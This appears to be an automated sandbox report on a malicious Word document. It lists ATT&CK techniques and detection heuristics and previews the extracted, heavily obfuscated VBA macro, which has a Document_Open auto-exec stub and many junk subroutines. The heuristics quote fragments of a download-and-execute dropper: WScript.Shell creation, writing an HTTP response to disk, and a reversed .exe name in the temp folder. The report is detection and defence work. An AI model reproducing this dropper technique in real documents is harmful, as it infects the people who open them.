MALICIOUS
338
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing VBA macros. The Document_Open macro is triggered upon opening, and it uses WScript.Shell and CreateObject to download and execute a second-stage payload. The document body explicitly instructs the user to enable content, indicating a social engineering lure to bypass macro security.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-7102478-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7102478-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set w = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.Write r.ResponseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set w = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.bbx1anai") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 32243 bytes |
SHA-256: 050741c4eb1559ce2ab148d6776917be4f23efb8449c23b1eba358df55e63022 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
617 of 1057 identifiers look randomly generated (e.g. 'a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0w') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Public Sub Document_Open() AA5ssetdtg0tn End Sub Attribute VB_Name = "vddew5wrcmp" Public Sub mhxbreztlf0() Dim efuz4wu3vaw As String Dim sqqbsy0vlvx As String Dim pmmgqu11gjg As String Dim ed5te4fh4js As String Dim vq3rqiuk4su As String Dim zxcxwjkykib As String Dim qdeethh4zrx As String Dim jkw0owjyihw As String Dim f4t2ygkd0m1 As String Dim AA2vmb41avnyg As String Dim pffuvwf02os As String Dim mekwipyka5l As String Dim jojb3dq53z2 As String Dim fnjsevifsrq As String Dim waaqo0ejw0i As String Dim ho024au5kyf As String Dim AA1ikxnrjojva As String Dim a3cyacs3k4z As String Dim kwddmy2zsdc As String Dim gifnhdprgfv As String End Sub Public Sub a3smiox0fj5() Dim sor2m1aawov As String Dim pmi3sgalbmq As String Dim wxlvrfot2z5 As String Dim gcovvixbuso As String Dim jngwm2qn3ml As String Dim AA0rvcitgtwq0 As String Dim nfhkvoy2po4 As String Dim qn4sap4g4jh As String Dim o3yhagekkru As String Dim vsvziphx3ey As String Dim vn1tibonwww As String Dim bq3hhvl4xz0 As String Dim rkqm5npxkdq As String Dim yao4af2ssti As String Dim kdwks2zyytg As String Dim n55nnrbuvwk As String Dim f4jkenbdvau As String Dim kw1hovlr1i3 As String Dim ydro3syzkkv As String Dim xpjxdr2whf0 As String End Sub Public Sub c1kscocrsnc() Dim ue0uqwnhwmo As String Dim AA2qqyzctzgvm As String Dim sgfeohin3rq As String Dim wnkgmenddzp As String Dim jrxwb5wtzi2 As String Dim yststgrvp3b As String Dim fccyyiwbzsj As String Dim AA5yayvaw32os As String Dim v3o144jb3tv As String Dim rk3qw0ozfnp As String Dim xfluvwbinwe As String Dim rgab3yctj1u As String Dim sv5xz3c1w1j As String Dim pgb30bawyw4 As String Dim zqccjkje1zb As String Dim t32js0lwta5 As String Dim AA1fgnawqpipe As String Dim mhrpw2pzpfc As String Dim AA2kntkj5p0z4 As String Dim g5vbxaohkpk As String End Sub Public Sub AA0rpnnkgfw0k() Dim eo3zgtppmeo As String Dim tjdf0kf2oyr As String Dim AA5dobqmcvqkt As String Dim AA1buci4svvba As String Dim ihrgn33cbo4 As String Dim dema221tuf3 As String Dim otruxlisxys As String Dim f3ge1bx2krp As String Dim kwl1qdfndat As String Dim AA5tx555howbj As String Dim ntlpveeqiku As String Dim jn4nqthjoif As String Dim z25kjwo2crv As String Dim iewjnrpjwvx As String Dim kiqtbd5hvyc As String Dim AA03hx2u5wz1y As String Dim wx4bxm2herz As String Dim vff5dqk3ahv As String Dim ej1f44fkher As String Dim AA3aoscipb5ko As String End Sub Public Sub zx1fbobaw03() Dim amsvpupw045 As String Dim ohhakgo4axe As String Dim AA0hifr3djyy3 As String Dim AA5332qs5czvw As String Dim wlrye0gxsmv As String Dim iwvjlme3uss As String Dim teccb4tmdc0 As String Dim xebkkyxxzf4 As String Dim AA0rtnfuiqsj5 As String Dim fxy2akcnje0 As String Dim ygcnbba10ru As String Dim u0zvsujwhbc As String Dim m21jeeehyzg As String Dim zhddgbg4mvr As String Dim kukp12jrib1 As String Dim zxjaw3oh5vs As String Dim cqd5nonyf4w As String Dim q1e3tglycnw As String Dim AA10rycgatyx3 As String Dim n3oqoaveq2h As String End Sub Public Sub ipckklksy3f() Dim tji4xdxvbwo As String Dim phbusvovdjw As String Dim k4cs1bu23hd As String Dim sh2xzoew4v0 As String Dim iqkerr1rxeq As String Dim sg32io20f0s As String Dim pybts5m5ph3 As String Dim yov04gg3aen As String Dim bfuqok31qpy As String Dim y1oqpmuimzm As String Dim zvgfrfejak0 As String Dim aiafb5dsnqz As String Dim bp2josw4oos As String Dim AA45rpwu0vpz5 As String Dim ldlomb44qgd As String Dim tthozlutqc5 As String Dim gjkvxrm51xh As String Dim ed2vbak3zcp As String Dim cuquexp2rac As String Dim vb4hj1xhmxf As String End Sub Public Sub AA2sio2ng1ckp() Dim ea42ncxenzm As String Dim namwibpktfq As String Dim n4bmolbgkow As String Dim zkwe3cd1inx As String Dim qfayjsj5rqi As String Dim nyyt50snsct As String Dim gi0mshinhda As String Dim yvz4xeqefz3 As String Dim r5tsvw1wpee As String Dim zqwfadaamv3 As String Dim k22q1prssao As String Dim trefxtp01yg As String Dim AA0iv33t3izxs As String Dim c2gjcszvqcn As String Dim AA20do0kwjut0 As String Dim AA0hech3tvba5 As String Dim rwntnx0bmjy As String Dim do50ts2m1sz As String Dim xmpijdjvi2w As String Dim nnl4p3jusrp As String End Sub Public Sub AA0ykkumh1kkx() Dim p442bhnf0vq As String Dim mv0s00tupp3 As String Dim AA4hel5r5c2uz As String Dim ukmyb21neuw As String Dim qklbcwstl1d As String Dim rslw50lmwsn As String Dim mvbhr31y4yy As String Dim pzizwptarno As String Dim zlznwftjox3 As String Dim bkymgz1xijz As String Dim AA0lc2hrzp3sf As String Dim ttumjapb5jm As String Dim njawkbcejor As String Dim AA21c1qwq1rk0 As String Dim crct3g5sank As String Dim bwb1njqruxo As String Dim qfmo0vgxnkk As String Dim kyz1vakzm2e As String Dim oe5iogn3pbr As String Dim kv4ibw1fflm As String End Sub Public Sub og4blia2pmq() Dim nr3nbwd53cn As String Dim tum2qcwc4mz As String Dim AA12szhzg3elo As String Dim qb24siwpyxz As String Dim xubp2hitrf5 As String Dim lvahs2quhtv As String Dim uacvw1jknxt As String Dim afkrzesulhd As String Dim AA5mu31zoznlf As String Dim AA1ndcc1wmexj As String Dim iakbuxzvmjq As String Dim fcxws2jouqe As String Dim c5tyk0ouvzu As String Dim pk0rqrmynmo As String Dim lav5ujmsos5 As String Dim hlylnzeumir As String Dim dnvadxcnav4 As String Dim eex4ujh5e3c As String Dim AA03fisl5tlvn As String Dim zti0gwmdcqb As String End Sub Public Sub dmjxpxqvhdx() Dim mqqq2si32vo As String Dim hnl1kfg3qib As String Dim ekk0z5tqzq5 As String Dim n0lv4uxlnry As String Dim zgdwl4vyyjt As String Dim reuejnqkxqh As String Dim bpav5bnt310 As String Dim ljsus214vno As String Dim oilwdfm225j As String Dim ngrnage1prl As String Dim o2aet14zedn As String Dim AA4nhlrbawwr1 As String Dim zbezjsnzen4 As String Dim esr3m2uz3mf As String Dim zieigilcmlh As String Dim AA2mafblnds3t As String Dim o4gfouuxmxv As String Dim uulromem4b2 As String Dim i2ascftz4uv As String Dim kyferhymx4u As String End Sub Public Sub insrvtlqrmf() Dim dn1l3lxqioc As String Dim yzthnsch5yh As String Dim d5megjedhd5 As String Dim e4ov4xrqlcl As String Dim pspumdwlkta As String Dim rbx3cwwd3vg As String Dim uxg2e2c0ioc As String Dim gvynucreoj5 As String Dim eetgs3b0vfj As String Dim khbslkigtre As String Dim mhkl0depcds As String Dim AA0esd2y4ob4w As String Dim q4l0b45vtcc As String Dim l5uibe4yovh As String Dim AA54jdlsfgeyn As String Dim AA0dw14jbs2te As String Dim AA1srdwbv50ri As String Dim ak4w2gyr4m2 As String Dim AA3xl2p5m3je5 As String Dim AA4u2m4ozo5ke As String End Sub Public Sub vimub0aqj4l() Dim dhimn3ujpca As String Dim wevbb3veq4j As String Dim vr2qvnqtkbb As String Dim y3hclf4oejl As String Dim c2tqlbkrbec As String Dim mcco1gxj20b As String Dim gmeow0nn2gn As String Dim cbe2vzjx2p4 As String Dim AA3njol1a33oz As String Dim vu2g3mnjati As String Dim AA4vqnhqlawdy As String Dim u4bjs0q1eud As String Dim im2hjecy0nt As String Dim vjazj1bg2yr As String Dim dfbbbmphsw2 As String Dim ktb2vjsckez As String Dim uinafx2v4yv As String Dim g1xzjjwcyzg As String Dim hxn1acnpjg3 As String Dim AA3wgt0fzgnlb As String End Sub Public Sub AA3n5whnsmzya() Dim ud0pd2o2hd0 As String Dim pzox1ngaj3m As String Dim bfr2v5ivubg As String Dim gj54vmggmvo As String Dim fiwsoszjc2x As String Dim uxzrg23w4gh As String Dim n0newly4p33 As String Dim p4uokbylcu3 As String Dim niv2rjzofbd As String Dim bnmafln0b4l As String Dim cgfckm4yql4 As String Dim g2aeqctp3at As String Dim pvaavnj3rmf As String Dim hxjd0xwudwy As String Dim csqex2sc1cg As String Dim xnaocfojglz As String Dim vhnytas1vog As String Dim AA5q35docbuwy As String Dim AA21wtncbmuvm As String Dim sq33lkrcz5a As String End Sub Public Sub jtgkxgiwrkb() Dim col3nbkpqv4 As String Dim AA3xodkhmwr5u As String Dim xanh5xdbsun As String Dim nojei5a4ocq As String Dim pznwnomxvhd As String Dim bxbv5bs14h1 As String Dim vajky42adfp As String Dim ogo2uefjoa2 As String Dim myagd1jxqqt As String Dim AA3qx5ffvde2d As String Dim cghz14eh3dc As String Dim zjl13hddy4n As String Dim qclo1te1kv3 As String Dim aio0irkb2gf As String Dim zidtmikczyi As String Dim jeqpoxryfar As String Dim ct2qnxibcdu As String Dim apcyanvqehy As String Dim t2sd3dzkmqt As String Dim rc1y1dtfic5 As String End Sub Public Sub iqzontdxlnf() Dim dxvxofwfnin As String Dim AA0oldn3brf5k As String Dim vhrpahesq1t As String Dim q3rn40zn2nk As String Dim jfgpkpy1mns As String Dim zhrr04mrwup As String Dim y3ngql44dmj As String Dim AA5uozl5cmjwe As String Dim xgyzwquaejo As String Dim rdo41gyya0b As String Dim dl0kaz1t4ux As String Dim hj4uwnhclcg As String Dim oezlapwjh4w As String Dim eh5zydi3z1x As String Dim zx2vide3umi As String Dim wr3gedotswa As String Dim yme5xwntu5n As String Dim xcfnfkk0k3r As String Dim a3slkyq3yic As String Dim gbrmhfktyz1 As String End Sub Public Sub z5hwn4lmuxd() Dim AA5li0l1yzheg As String Dim bjpz2d2z1wm As String Dim AA23zg14rk3i0 As String Dim AA5lxxa43r5df As String Dim o0st3fql23u As String Dim f2acn1yrdbq As String Dim wd5zw3zjqqo As String Dim AA4adzam2d3si As String Dim AA0yhfxr2nqrc As String Dim bmpzfnmuf0s As String Dim noqlaiurxxe As String Dim qj2elrruw3q As String Dim ucpz2vi3cwq As String Dim cva0temyjuh As String Dim hwnlfd05m1p As String Dim f3xqrtdfou2 As String Dim ixqn0c3i3ik As String Dim pn3tidy01tz As String Dim ic5tymvqtc5 As String Dim AA32yb03rat5z As String End Sub Public Sub sjzu0oknftt() Dim urn20qjrfpw As String Dim zcltmldqr5p As String Dim zrxbr2ziab5 As String Dim paukgq34ems As String Dim xlu3t3nqsc1 As String Dim AA0lvvtxu4tna As String Dim pbak01aehxj As String Dim AA3uzwxufb0xi As String Dim bzhg5evxs12 As String Dim AA2abey0pxd5v As String Dim sgfir3whvrl As String Dim ahz3zbedbk0 As String Dim pdutsqum3jv As String Dim tfytct5o2qh As String Dim dpl4zecevjh As String Dim f2owax1q0fa As String Dim AA3e12rg3gejv As String Dim b0upbbbtm14 As String Dim jfriuhughen As String Dim rrczreyupgh As String End Sub Public Sub pd14bpjkzxg() Dim ebrlygbtwmk As String Dim zq0dszfp23l As String Dim y25serz0ycv As String Dim smagvjtjvyo As String Dim rxxlyh1nswo As String Dim AA3asyl1j3ayo As String Dim AA3y0hyuzfrmh As String Dim ea55fzsd335 As String Dim qeh3uw0tgtz As String Dim ay42wi11k12 As String Dim AA3ngodcsrelo As String Dim AA40lzma4hnyi As String Dim sumytii4k3x As String Dim hl34dt0m54v As String Dim nypizupe1eu As String Dim hoqtyrgrxwg As String Dim bj32rxxtc1p As String Dim yrodr11cggr As String Dim l2zezjsbw5j As String Dim akcoaccbvqf As String End Sub Public Sub nk1420b0cqm() Dim AA4aqowmrpefc As String Dim y5to05k4mgj As String Dim hglucl55uok As String Dim AA5pv5lgjqxl4 As String Dim kh53paknklb As String Dim AA1pm2ja1niwu As String Dim AA1pkl05b23bl As String Dim AA0lgac2byj2j As String Dim wshz5w2gs0z As String Dim jw0oqokmmal As String Dim tvtlkwi1xz3 As String Dim hl5mjrbxbeo As String Dim jlenaohtlxi As String Dim mdfstotuqkc As String Dim xd0f0x34khn As String Dim o233xsbu3rn As String Dim rxhcgdw4qmk As String Dim styh1xleyud As String Dim zuctefjzvlx As String Dim tpfobhascen As String End Sub Public Sub AA12y1huqclr0() Dim zsol5yhgtmk As String Dim v4smjzzqqtm As String Dim d0m20ar15i2 As String Dim enfeu2liysb As String Dim txwkrcjda54 As String Dim bhu2nruvq5v As String Dim afmjrm2lgbz As String Dim AA1r54siat0zh As String Dim l3vlsbqfom2 As String Dim uni55phms4k As String Dim AA4pelcaqkp5l As String Dim s2ujtq3sxdh As String Dim fkyaam3o4vw As String Dim amypirpgtxg As String Dim AA3zdzw5w5huq As String Dim pstonikboyl As String Dim dhr1kvkhjcw As String Dim wmyc0fgeamp As String Dim czna0ba0ffk As String Dim hr145se0d3c As String End Sub Public Sub AA344gfgg033o() Dim wqmkuzxxlp0 As String Dim AA5pzpwlfhxin As String Dim qbjknkyqik3 As String Dim mo0542pgqcw As String Dim AA3mgcp1zdpsx As String Dim u4rdkqdg303 As String Dim jpos3ssfv2p As String Dim hs05nc4knhr As String Dim AA4zd22gs23jp As String Dim kbiby2e5tm0 As String Dim pulz1ug3nne As String Dim w5sxzyqwywv As String Dim zzmuyzgdixx As String Dim ycnwhav5drc As String Dim t2gqwfdo5wp As String Dim sfmlvfutk1d As String Dim AA43tdd5lxnii As String Dim dvqkaqgroee As String Dim nzx1lrxdzdd As String Dim AA44zht42isuz As String End Sub Public Sub tltb5nbl1jp() Dim epmr1e2bo4u As String Dim oxld3g04kfc As String Dim lso0osqv14l As String Dim s5hxq3iwih1 As String Dim eqv5lry3c2y As String Dim wl0nmmokhde As String Dim ararnzeyqm0 As String Dim zalrgktjhey As String Dim jrmeamb2ayz As String Dim dgkayl4pwso As String Dim bjmfjnb4ypl As String Dim a44lseetusi As String Dim k5g3eycnnb3 As String Dim AA4t4ejodg4ks As String Dim fhxlvmwqbj5 As String Dim AA5dz4mswrleo As String Dim AA5wz5u4v2qlv As String Dim otppdp1vaen As String Dim eaddsjfwsai As String Dim AA4esn15tqlv3 As String End Sub Public Sub vg3iqyk02iq() Dim ndm0tp1hewj As String Dim w2gm5i5arxd As String Dim lgcbbf2n2vm As String Dim AA353ra0gszcu As String Dim fd3elskkjur As String Dim AA5w44wcg3wj3 As String Dim vier2vl3bvh As String Dim AA2nma0epju0w As String Dim AA2deb4eedzfx As String Dim joukyqfmhrj As String Dim wqcqqzn55om As String Dim dnnardlh2gh As String Dim sew3njft0gu As String Dim czfbqqemlb0 As String Dim qbnpl2w4cz5 As String Dim AA545lfzvvagw As String Dim AA0dtqbo5ocow As String Dim jmc5eszm1tn As String Dim AA3ct4n2iwhvp As String Dim gaaqbc1l5fe As String End Sub Public Sub AA0hnslhl3pil() Dim df1lkbh2z1u As String Dim AA3arbg04g2n5 As String Dim bxqwhmp2z1l As String Dim ll3fvd4qp5j As String Dim cpwofynqmdb As String Dim li3v0ejtdak As String Dim piury4jpa3y As String Dim uqpubadtnns As String Dim AA3yirdlbuh1e As String Dim tertzkfqlf0 As String Dim kv1jqwsrlmd As String Dim f4bmkflajwo As String Dim rvb3zcrcsvi As String Dim pxkxhvor00j As String Dim liei5gubp2m As String Dim flgjfgceha2 As String Dim aqpwyf4juqw As String Dim atklg4qfksz As String Dim qpfpnchhunn As String Dim boo4xrtrykh As String End Sub Public Sub cxyyl5t0ums() Dim ayt3k5oqhyv As String Dim mbppsrc5ivk As String Dim d52pzoarzls As String Dim kzwpbolk5cz As String Dim oi3yq0xjsp3 As String Dim AA1nfapr2tsug As String Dim cwwwbitg5jj As String Dim xvjfmugb5zk As String Dim mcgrsrms3bx As String Dim fcfesdzhir5 As String Dim njnrhn0znse As String Dim bk0hplrggix As String Dim wrbhnrselqi As String Dim xr2cifvfhun As String Dim xhmhv2jv1vl As String Dim AA2txayqu5uxx As String Dim cb24jv5rdte As String Dim y05e3c0s1rt As String Dim wmdycrgnws0 As String Dim AA1pwz2bet4pt As String End Sub Public Sub h1cewlpqsgk() Dim AA0v1yjnllauy As String Dim qxmeyeekoni As String Dim sbed4jjfzio As String Dim solnevzpkvc As String Dim AA3ev5xdwr2je As String Dim jleqkgb1cuk As String Dim ai5ez0gzirc As String Dim AA2raf1le3it0 As String Dim oef3t2iwnl1 As String Dim AA2vzkgt2ibv0 As String Dim tcfd2qa3rvc As String Dim AA5xwemnugakg As String Dim nwe5snacau4 As String Dim qag5lpgbofc As String Dim flsm5yisx1z As String Dim zjdvtkj4wl3 As String Dim AA1cems5vx5qf As String Dim d3ujv5coe5u As String Dim jl25wns5ezt As String Dim i1xpn4v4yc3 As String End Sub Public Sub eiunwxtfiht() Dim nzyyphzflba As String Dim AA4gdtsok10hq As String Dim pe02mn1km02 As String Dim n5pfxzataif As String Dim t04iyyia0np As String Dim hyyqawwz3rn As String Dim blsrp14vy41 As String Dim bp1hxmm4nnr As String Dim kyo1sgfkoag As String Dim qhvdfljcxpv As String Dim xjynuzufxol As String Dim jdrbykjl4dw As String Dim xdcp34psqsb As String Dim AA2lupuueq3ff As String Dim cnynickdcok As String Dim AA5q51in5bjen As String Dim xuoclb54rz0 As String Dim wufyybfptn5 As String Dim mhyk3zlvxsp As String Dim b3fd1qvnjwr As String End Sub Public Sub mh4n5efx2mv() Dim AA5snj1dz1jyq As String Dim rryneed4cvj As String Dim AA2u41whu24gn As String Dim wyeh02fz020 As String Dim i3ak3l14qfc As String Dim AA00gra3u5nxt As String Dim kbaq4saaemu As String Dim yr1sm1wkcsz As String Dim mc3nudmbsb4 As String Dim y1n3k1jfxax As String Dim u0ounhzvf1f As String Dim t2wazgove30 As String Dim xn13zblvmuu As String Dim fbftl4lftt5 As String Dim oo1ywsodedi As String Dim kuhlxyasibf As String Dim AA5mep20xd3uw As String Dim jhntcrtpn2c As String Dim zrvy4vscio2 As String Dim u4n3pqyoq0j As String End Sub Public Sub boy3hbujbhi() Dim aukdlwr3ykw As String Dim m2kzrncinnc As String Dim a4mc2qeuvcu As String Dim cua2rm3yrag As String Dim AA4ph54w3fzzl As String Dim t0a4v3fkczc As String Dim tdhzmvfsc04 As String Dim zezidrrrfq0 As String Dim o2yivgphoub As String Dim txcrxg3x2ky As String Dim lqzfs5dx3qt As String Dim vpmnvoarsun As String Dim xd5pjkhfpnk As String Dim y3rxsc24h00 As String Dim e1lv1fxugpo As String Dim ezexl5naak3 As String Dim lyekwpsjds4 As String Dim pqerx5jmh5w As String Dim bnxisil5fsg As String Dim nnaoxc5jwh5 As String End Sub Public Sub cmpjiks5ihf() Dim bfd1vtqfftp As String Dim AA053m5rmwd0l As String Dim qcr24cjimh2 As String Dim bvgc0v3m3ju As String Dim bvicao2oj2s As String Dim tdeujdlhmky As String Dim npxlgoewlub As String Dim wstkidjn5c4 As String Dim mw0hbiwdhqx As String Dim a125hae12ye As String Dim akc0qyrxdiw As String Dim lx1zclwobk5 As String Dim zyc1savdd1t As String Dim gomntoo5k1x As String Dim nxy5xysdoud As String Dim ipagz0sixb2 As String Dim olg4zbkjr2l As String Dim cneee4ca3gy As String Dim tvqnl44hbvj As String Dim tz5un141zgw As String End Sub Public Sub AA3sd4mlrstkp() Dim eikzhswhfeb As String Dim zekxf1gnwhg As String Dim AA0t3y1cdj2ho As String Dim AA4tegzxcj42k As String Dim AA5c20firptiq As String Dim ekdjfbdkp3b As String Dim edidpof2txe As String Dim AA1y0xh0ixkcx As String Dim iszyryxwzo4 As String Dim xsr2syn2hxd As String Dim v5zp3woozd2 As String Dim i4iqc5bqejt As String Dim tfmdamaydho As String Dim nj3pgji433g As String Dim inflx5s12kh As String Dim posmt5jdghb As String Dim mg2nob3ths5 As String Dim fmkqkbgxzpp As String Dim tvbhojuxncm As String Dim wfvrbdsk1yf As String End Sub Public Sub iulz02t1gvl() Dim gtvx13pvami As String Dim AA5f0evteiouf As String Dim zuadgdvp2xv As String Dim tqkst0rujji As String Dim AA2lf4nqqhl4l As String Dim d4amjat5eli As String Dim gksn3mpoow5 As String Dim i42gy1kznga As String Dim hjqold44yjv As String Dim ugwqhex0xep As String Dim lemigce45ek As String Dim ztogdiy4fc0 As String Dim d5l0gsuoggc As String Dim dox3o41ys4z As String Dim k31uhbvoxiw As String Dim tynnaiw2qhs As String Dim tocde3qpw5g As String Dim u4azovbryur As String Dim oqh0s3zvsz5 As String Dim AA5e5rxfkgzfd As String End Sub Public Sub nwfgh4otfrv() Dim nb4xu3mdj0a As String Dim gcgv1zql1e4 As String Dim g50lmcv4hqs As String Dim hpr5uqukbtv As String Dim tw0du04o5py As String Dim cvgx1adxkj5 As String Dim lluprfiy52t As String Dim tyfsvowfonj As String Dim vhcln2pqgvm As String Dim fwp4utf3l4d As String Dim qdcjwr1n2w5 As String Dim tsni54qm04p As String Dim ocnatlowri2 As String Dim dpxmw5llvn1 As String Dim AA2jelbryacjf As String Dim bfce2rcbuly As String Dim AA5auo3eha1xx As String Dim ehpff1ov2pq As String Dim whb0g1jor2y As String Dim q5jrqhhaoug As String End Sub Public Sub AA0ib13fciyls() Dim slid1dompwt As String Dim j4kjnvf0d5b As String Dim rvhvdccuvgx As String Dim AA3uxmvmvidbk As String Dim tipriaplgjx As String Dim rdcduu1ti4i As String Dim AA0hj14x30vou As String Dim w4vqaoswbey As String Dim AA4rd5xqtro3o As String Dim oyweg0xx5am As String Dim gwb5gksk2xc As String Dim vmhckjpgldq As String Dim ypbperhrlji As String Dim b2hbrtcrsml As String Dim AA2tlyy25bqmf As String Dim AA5nbcafazkab As String Dim qkvwfx0w55l As String Dim pw2scg3bf4y As String Dim g3gb0mf4zso As String Dim ta5bkjhn3b2 As String End Sub Public Sub h4d1tqy4jvg() Dim x3qeehouuxw As String Dim sz0g00i3btw As String Dim i2i3jzohzbi As String Dim e3ongqte153 As String Dim jv0bnqz1gcx As String Dim hks4beciv25 As String Dim jteivmbytng As String Dim ux4g2sntn0t As String Dim rvj2qht4mcq As String Dim zpe1cmiftcx As String Dim x2stpnar10j As String Dim zftws3o055o As String Dim gab4fwgp1v0 As String Dim dkvfhrlb0j3 As String Dim igv1ma11oxc As String Dim nsq3wzes2ad As String Dim viqbrfftts5 As String Dim hnb1xoye3nb As String Dim xfuktjuq4v0 As String Dim xu3xlbgdgbl As String End Sub Public Sub jglz3u2z5ao() Dim azl5ja0zuv5 As String Dim rw4xrhoadeo As String Dim cjzmogje2ve As String Dim qkeox5uzbdq As String Dim fobe12yd5s1 As String Dim qxaczgpzjr3 As String Dim mhuyeikx1vv As String Dim AA4mgafmskbb3 As String Dim xchpms10hjp As String Dim rybvxqbi20c As String Dim tq4vn4lcbsd As String Dim cmrm0kpjj3s As String Dim tqc3acri5b5 As String Dim zcr55d4faom As String Dim pfjncz33b2h As String Dim o5gghpvibxs As String Dim flvgfb0fvph As String Dim n4mp0trkcc1 As String Dim hlzw1mjxaca As String Dim v41v3e300wm As String End Sub Public Sub AA5wcmbd425zi() Dim hs4j1gf1ql4 As String Dim bzpfkfoibny As String Dim m24sofobc14 As String Dim z1053y1kp2y As String Dim AA3w1zur3oqcc As String Dim tkrp1ymrvgq As String Dim z3phzeq1wtc As String Dim g2ar3ocoglp As String Dim zwrasfd0t1h As String Dim AA4qq3nokxstm As String Dim ucdrzp1u3k2 As String Dim yrca05ukgas As String Dim gbzrnwty15o As String Dim AA3e2wztf240x As String Dim mqktswkzlqo As String Dim AA5zthn4o5qdh As String Dim zxsaz3srh2k As String Dim yoqaqvwsnto As String Dim ifvgs3lmvn5 As String Dim f5kyzqxq1p5 As String End Sub Public Sub rr5q1d2fvao() Dim wx0edex1ct4 As String Dim el5yum2nqeu As String Dim dj4uzk232pb As String Dim usjn3ril3ld As String Dim gumtn12naj3 As String Dim xuaabtvguhe As String Dim p3txtcbdqbb As String Dim pd4lmqyd3xo As String Dim ag51qlhcelg As String Dim g5yldamccuq As String Dim py4hyxroa5a As String Dim AA0yjavcvywv0 As String Dim nwyk3yjd44f As String Dim ked34p3trrw As String Dim eh3jefbp4qf As String Dim knsq5hyppb4 As String Dim xccyrc4z4h4 As String Dim vx55jdtesou As String Dim ws4nzgtjsv2 As String Dim wivaw0sqq3s As String End Sub Public Sub vpqgxina2nw() Dim AA2gfpezocyvo As String Dim AA1pb3qrwpbof As String Dim vsbx5mzu1mj As String Dim j14okoyc01p As String Dim AA2b5eqb5jlgc As String Dim zg0vnhzvfge As String Dim AA11l5jf1ftun As String Dim shmr5zg2wbs As String Dim AA3ylpxlwy50f As String Dim AA3azrt4n5lwd As String Dim r5cbzor0tje As String Dim mm1qtkgu3ge As String Dim AA3aay44tfd5k As String Dim AA13de2xslw3c As String Dim osjycgsumqj As String Dim htnw4bmjye5 As String Dim whac2nydqpa As String Dim zuabf13kirq As String Dim mllje0nnzue As String Dim ux30fzn23wo As String End Sub Public Sub icegu03lkhx() Dim d2k01baeceu As String Dim AA3xt1wak1b3j As String Dim ryoxs2vq1lu As String Dim k3snzjtlr5b As String Dim ariopdls1m3 As String Dim zbmjmc5bvbf As String Dim q3retzbnezu As String Dim lusesmb5xg2 As String Dim AA1ctwxr0ybm4 As String Dim zq5egaud4m2 As String Dim qn5jv2f0w2d As String Dim hrujmbspshx As String Dim raqu3ebyfmi As String Dim fkwljgtcseu As String Dim ojfwye0vpny As String Dim j0l5qrdi5c4 As String Dim gxrfmhhwsaz As String Dim f2bgs5mjvjp As String Dim yv5bacazrqh As String Dim ijk3uatk4ku As String End Sub Public Sub AA1i2ztzbqvnw() Dim d12gmc2inmj As String Dim AA2dlv24ll4t5 As String Dim xzljdqjz1zs As String Dim bxxy4205ehh As String Dim s4i0czgih2h As String Dim iy0eabwd2op As String Dim xd50f1plceu As String Dim srawctcgoyl As String Dim syihr1jr3ka As String Dim AA2vazznjwicp As String Dim qwv3oxqnhun As String Dim kxmxqqmmjei As String Dim AA5nu3szvfs1c As String Dim mowf3rs0342 As String Dim pijvqruatqn As String Dim vht0cwh5zeq As String Dim AA231umv1gtag As String Dim b5ih1240p0a As String Dim AA5z10iwr5pha As String Dim AA0gdsfkxxhtc As String End Sub … |
